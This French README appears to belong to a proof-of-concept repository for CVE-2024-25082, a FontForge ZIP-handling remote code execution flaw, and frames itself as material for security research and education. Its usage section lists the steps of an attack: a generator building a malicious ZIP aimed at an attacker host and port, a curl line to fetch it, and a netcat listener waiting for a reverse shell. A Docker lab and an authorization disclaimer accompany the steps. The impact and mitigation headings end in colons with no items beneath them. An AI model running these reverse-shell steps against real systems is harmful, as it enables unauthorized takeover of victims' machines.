
Exploit de preuve de concept pour CVE-2024-25082, démontrant l'exécution de code à distance dans FontForge via des archives ZIP fabriquées. Inclut un générateur de payload, un laboratoire Docker et un rapport technique pour la recherche en sécurité et l'éducation.
Exploit de preuve de concept pour CVE-2024-25082, une vulnérabilité affectant FontForge qui permet l'exécution de code à distance (RCE) via une archive ZIP malveillante.
Ce dépôt montre comment la vulnérabilité peut être exploitée dans un environnement de laboratoire contrôlé à des fins de recherche en sécurité et d'éducation.
La vulnérabilité survient en raison d'une validation inadéquate des fichiers contenus dans les archives ZIP, permettant à un attaquant d'exécuter des commandes arbitraires sur le système cible.
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│ └── exploit.zip
├── writeup.md
└── License
Fichier Description
exploit.py Génère la charge utile ZIP malveillante poc/ Contient les fichiers de preuve de concept générés writeup.md Explication technique de la vulnérabilité
Installer les outils facultatifs :
sudo apt install netcat
python3 exploit.py --lhost <Votre IP> --lport <Votre Port>
Cela générera un fichier exploit.zip malveillant.
python3 -m http.server 8080
curl http://<Votre IP>:8080/exploit.zip -o /chemin/vers/le/répertoire/de/téléchargement/exploit.zip
nc -lvnp <Votre Port>
En cas de succès, un shell devrait être obtenu depuis le système cible.
Un environnement vulnérable reproductible est fourni dans le répertoire docker/.
Exemple :
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln
Cela permet des tests sécurisés sans affecter les systèmes de production.
Un attaquant capable de télécharger ou de contrôler des fichiers ZIP traités par l'application vulnérable peut :
Étapes d'atténuation recommandées :
Ce dépôt contient un code de preuve de concept pour une vulnérabilité divulguée publiquement.
Le code est fourni strictement pour :
N'utilisez PAS ce code contre des systèmes sans autorisation explicite.
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce logiciel.
Moamen Elmaghrabi
Étudiant en cybersécurité
Tests de pénétration et développement d'exploits
Ce projet est sous licence MIT.
Consultez le fichier LICENSE pour plus de détails.